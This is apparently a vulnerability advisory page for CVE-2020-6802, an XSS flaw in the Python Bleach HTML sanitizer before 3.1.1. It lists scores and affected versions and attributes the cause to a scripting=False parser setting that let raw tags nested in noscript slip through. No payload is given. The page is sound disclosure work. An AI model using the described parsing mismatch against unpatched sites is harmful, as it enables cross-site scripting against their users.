CVE-2020-6802: XSS in Bleach when noscript and raw tag whitelisted
6.1
CVSS Score
3.1
Basic Information
CVE ID
GHSA ID
EPSS Score
0.72178%
CWE
Published
2/24/2020
Updated
9/13/2024
KEV Status
No
Technology
Python
Technical Details
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
---|---|---|---|
bleach | pip | < 3.1.1 | 3.1.1 |
Vulnerability Intelligence
Miggo AI
Root Cause Analysis
The vulnerability stems from Bleach's HTML parser handling <noscript> differently than browsers. The commit diff shows the critical fix was changing 'scripting=False' to 'scripting=True' in BleachHTMLParser._parse
to align with browser behavior. This parameter controls whether to parse <noscript> content as HTML (scripting=False) or ignore it as browsers do when JS is enabled (scripting=True). The vulnerable version's 'False' setting created a parsing mismatch that attackers exploited by nesting raw tags inside <noscript>.